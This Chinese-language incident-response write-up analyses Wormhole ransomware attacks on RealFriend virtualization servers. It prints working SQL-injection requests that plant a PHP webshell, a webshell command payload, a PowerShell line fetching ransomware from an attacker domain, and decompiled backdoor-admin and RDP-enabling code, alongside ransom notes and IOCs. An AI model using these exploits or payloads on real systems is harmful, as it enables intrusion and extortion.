随便分析下
拿到样本之后丢IDA
代码挺直白的,文件后缀白名单,服务名,进程名,卷影拷贝删除命令,加密公钥都明文写Main函数里面
还有个bat文件
1 start /min deleteFile.bat
大概看了一下,应该是用来删除以下几个文件
Wormhole.exe
WormholeB.exe
ruiyouabcd1234.php
phpinfo.php
logo-eoffice.php
前两个大概率是勒索程序了Web根目录上都写了十几个马了
沙箱行为只有加密文件,没有网络通信行为
通过某种方法抓到了Webshell的内容
1 abcd1234<?php eval($_POST["LYYKtWSAQq6HsF3N"]);?>
整点非常规应急响应,根据日志以及魔改Webshell还原出如下攻击流程
漏洞为瑞友天翼应用虚拟化系统的SQL注入漏洞,加上管理员权限运行就可以写入Webshell了
受影响的版本为 5.x <= Version <= 7.0.2.1
资产探测以及版本信息确认
1 2 3 4 5 GET /RapAgent.xgi?CMD=GetRegInfo HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
写入phpinfo以确认漏洞是否存在
1 2 3 4 5 GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cphpinfo.php%22+--+-&cmd=UserLogin HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
写入Webshell
1 2 3 4 5 GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27abcd1234%3C%3Fphp+eval%28%24_POST%5B%22LYYKtWSAQq6HsF3N%22%5D%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cruiyouabcd1234.php%22+--+-&cmd=UserLogin HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
执行命令
1 2 3 4 5 6 7 8 9 10 POST /ruiyouabcd1234.php HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 5255 LYYKtWSAQq6HsF3N=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.41c435%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220a701%22.%221644b%22%3Becho%20%40asenc(%24output)%3Becho%20%229303%22.%2202044%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22c2cf9b4c7b1194%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22q489dad02f83c5%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22ffc93031853f3%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&c2cf9b4c7b1194=H4Y21k&ffc93031853f3=se&q489dad02f83c5=3AY2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMgKHg4NikvUmVhbEZyaWVuZC9SYXAgU2VydmVyL1dlYlJvb3QiJnBvd2Vyc2hlbGwgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIihOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly93d3cucmc3N2U2NDJtdGNobTU4aC5jb20vV29ybWhvbGVCLmV4ZScsICdDOlxQcm9ncmFtIEZpbGVzICh4ODYpXFJlYWxGcmllbmRcUmFwIFNlcnZlclxXZWJSb290XFdvcm1ob2xlQi5leGUnKTsgaWYgKCQ%2FKSB7IFdyaXRlLUhvc3QgJ1N1Y2Nlc3MnIH0iJmVjaG8gYzk5MzAzMmE1JmNkJmVjaG8gYzEwMGUxZWFl
执行命令如下
1 cd /d "C:/Program Files (x86)/RealFriend/Rap Server/WebRoot"&powershell -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://www.rg77e642mtchm58h.com/WormholeB.exe', 'C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\WormholeB.exe'); if ($?) { Write-Host 'Success' }"&echo c993032a5&cd&echo c100e1eae
失陷站点上存在Wormhole.exe,估计是早批次的命令执行的结果
虽然下载了勒索程序,但是并没有直接执行,大概是在做进一步的内网渗透?
Public Key
1 2 3 4 5 6 7 8 9 -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqnJhs7S6xt+A0E/xUcaO DcK/R8LZoLKhsQYG9b/uibVk/4cfEFtGwdTnM3AZbDWKqEJL+L/xt7J2AQzG3beS 7vmRv0NyDDvrArf7QPl5i/A9Gyl5Tr82G+shZwLDlLETCI8KgNSFvW6VgUDnKnCR xjqdYxa4Y80ud2q5FmlJA+KMmBYyQVVAaxgbR72LqTASf1E4FohGOa3/DLAQbQqI 7wOsudYKMKPmImZ7AxXe86mxRI3fjmUWRAddbkl/GILWu5KidArG0a9EENVADh2g B0g3iGSzz9B/erqAKG7Sd7s6i0TlVnUmj+FSs9lObKCCghrOBgLoWjMiYH2SSt4i XQIDAQAB -----END PUBLIC KEY-----
Ransom Note
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Please contact us via Tox.chat tool or qtox tool Download Tox.chat https://tox.chat/download.html Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox If your chat Tool cannot connect to the Internet, please set up a proxy. Add our TOX ID and send an encrypted file and Wormhole ID for testing decryption. Our TOX ID 503313BA88174FDF187C5009A43B45CBC144D313EFBF98BB75BFA084B5743E3ECA94499F95ED Your Wormhole ID: aWtfpQoMkfi5reJ7kRi77kHpH0u+eu1vSD9VL86J0XC1s+FfWkWNG8MIk4ypSNj7 v6PsXpbmq3OhPf84ctfZiQhqnwGHWjKpCKdvx1r9uQ7C5xty9tmQ1vl/KeW0RfaI F/4BGazwcg0ZJQTxMfqVRo+5lfFIeb1fCs0aZbpSE3mPMS6YBDLhRcTiKuvDPZ/2 My5YSkFK72/YTZhjJ4I40TN/k7ZBg1KS7WYjfMJlUJ16tI79VkyDD+BUU9dYAacE Nhb+OxQn7TB1LCOE/gDEXdbpEi/9evi0vCt/ycPDP73wVknQGapkfZSPtI0Gup3e sYSpovrzOQyKng8wHIZTog==
勒索金额为0.023BTC,至少当时是
80.78.24.254
www.rg77e642mtchm58h.com dff3fd0197c5ea432f58f62a5f40dfa8e0cdc3ecca36bcf3221962349fbd9a22
8b301ea74563e786042a59b4ac95bb4ef738fb8c7d71d1e5f3c6ce90dbfa1980
53b576cb4af70f4610df30fbfd872f526d280fa65780dc23cd304463d34cd13f
漏洞利用的IP,文件服务器域名,以及三个勒索程序
准备
GetShell
信息收集
他人遗留文件
access.log,获得更多攻击行为
Powershell记录
修改他人Webshell,记录POST参数以获取更多攻击行为
Cleaning
删除自身遗留文件
access.log覆写
handle解除文件占用(管理员权限)
勒索程序更新了,多了个要删除的文件test1.exe
正好失陷机器上能下载到test1.exe
总共就两个函数,一个加后门管理员账户,一个开远程桌面访问
后门账户是"test1:n5eEUa&p3whUmCMf"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 int sub_401170() { BYTE v1[4]; // [esp+0h] [ebp-430h] BYREF BYTE buf[4]; // [esp+4h] [ebp-42Ch] BYREF WCHAR *v3; // [esp+8h] [ebp-428h] int v4; // [esp+10h] [ebp-420h] int v5; // [esp+14h] [ebp-41Ch] int v6; // [esp+18h] [ebp-418h] int v7; // [esp+1Ch] [ebp-414h] int v8; // [esp+20h] [ebp-410h] DWORD parm_err; // [esp+24h] [ebp-40Ch] BYREF WCHAR WideCharStr[256]; // [esp+28h] [ebp-408h] BYREF WCHAR v11[258]; // [esp+228h] [ebp-208h] BYREF MultiByteToWideChar(0, 0, "test1", -1, WideCharStr, 256); MultiByteToWideChar(0, 0, "n5eEUa&p3whUmCMf", -1, v11, 256); parm_err = 0; *(_DWORD *)buf = WideCharStr; v3 = v11; v4 = 1; v5 = 0; v6 = 0; v7 = 1; v8 = 0; if ( NetUserAdd(0, 1u, buf, &parm_err) ) return sub_401010("Add user failed.\n", v1[0]); sub_401010("Add user success.\n", v1[0]); *(_DWORD *)v1 = WideCharStr; if ( NetLocalGroupAddMembers(0, L"Administrators", 3u, v1, 1u) ) return sub_401010("Failed to add user to Administrators group.\n", v1[0]); else return sub_401010("User added to Administrators group successfully.\n", v1[0]); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 char sub_401050() { int v0; // ecx int v1; // eax int v3; // ecx int v4; // eax int v5; // [esp+0h] [ebp-14h] int v6; // [esp+0h] [ebp-14h] HKEY phkResult; // [esp+4h] [ebp-10h] BYREF BYTE Data[4]; // [esp+8h] [ebp-Ch] BYREF DWORD cbData; // [esp+Ch] [ebp-8h] BYREF cbData = 4; if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", 0, 0x2001Fu, &phkResult) ) goto LABEL_2; if ( RegQueryValueExA(phkResult, "fDenyTSConnections", 0, 0, Data, &cbData) || *(_DWORD *)Data && (*(_DWORD *)Data = 0, RegSetValueExA(phkResult, "fDenyTSConnections", 0, 4u, Data, 4u)) ) { RegCloseKey(phkResult); LABEL_2: v1 = sub_401290(v0, sub_4014D0); std::ostream::operator<<(v1, v5); return 0; } v4 = sub_401290(v3, sub_4014D0); std::ostream::operator<<(v4, v6); RegCloseKey(phkResult); return 1; }
文件服务器上也多了fscan跟mimikatz,估计是要做内网渗透了,跟我之前预估的差不多
IOC
62b241d46f17d0bf2c3026c87febf8b0f5cd8c04a87404da0e86abb27e30ab95 WormholeB.exe
873c085e01df8912eb5d9d021950bc451cbc3568b43830a4d31a58bfc804996f test1.exe
78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029 fscan.exe (UPX)
d86e5d2701b548dfbe0419bcffb2ae82c6ccdeb6dc9612050273c543a6f5215a master.zip (mimikatz)
文件服务器上面多了个32位的fscan.exe
失陷主机上多了个regeorg,感觉大概率是Wormhole放的
程序也更新了,这次放的是Wormhole.exe
编译时间是2024.05.12 14:15:01 (UTC+8)
服务器上的文件时间是2024.05.12 14:36:56 (UTC+8)
删除的文件变成了Wormhole.exe和test1.exe
而且多了个删除后门用户的函数和删除Windows事件日志的函数sub_44E050()
1 2 3 4 5 6 7 DWORD sub_44EC80() { WCHAR WideCharStr[256]; // [esp+0h] [ebp-204h] BYREF MultiByteToWideChar(0, 0, "test1", -1, WideCharStr, 256); return NetUserDel(0, WideCharStr); }
删日志的函数太长了,懒得放了
Ransom Note
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Please contact us through the qtox tool within 3 days and Pay 0.023btc otherwise we will delete the password and sell the data Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox if you can't contact us, please contact some data recovery company(suggest taobao.com), may they can contact to us. Add our TOX ID and send an encrypted file and Wormhole ID for testing decryption. Our TOX ID 503313BA88174FDF187C5009A43B45CBC144D313EFBF98BB75BFA084B5743E3ECA94499F95ED Your Wormhole ID: eRImtlWObmRSVHL6wKAFySqWjpGtrGrBOKya1kMIkQiWwzyZmm71Rv7NcoIlW4IM 41oNmkIa3uH9yg96hNyyImkTvFhUwngy4Ng4gFTEuVoZfqeuEym7I1ZmPibLT6Mz rw25eKae5fr3CqGPJEu0Cj7M+5gQOXQO/QE1NWIVmYWzcFxBxHD5Zojlo1IVZZ0V 9887Ms/oOK3lHpsR1XF2e/NmcSy4x5o9bNTjI8JGhO2Y0XfpQRayqdRGXC4R2wLk 2V+YwaQwDIvK04iT1qsE6Gy2PSY+jZEkwvutyxYwX6K+4rglo8o/pBl2mLxovsrb XCb8TrA5eEIaYvtUd0zyqQ==
有点Chinglish,语法错误错得跟Tellyouthepass一个味
IOC
0582e46a142fa10e45ec2d1e207570d80252897e61e82e4f7475b9c971776e96 Wormhole.exe
612d940023d8530377f0571cb839d667e172dcbe307878ffd31b20f534c1169d fscan32.exe
EOF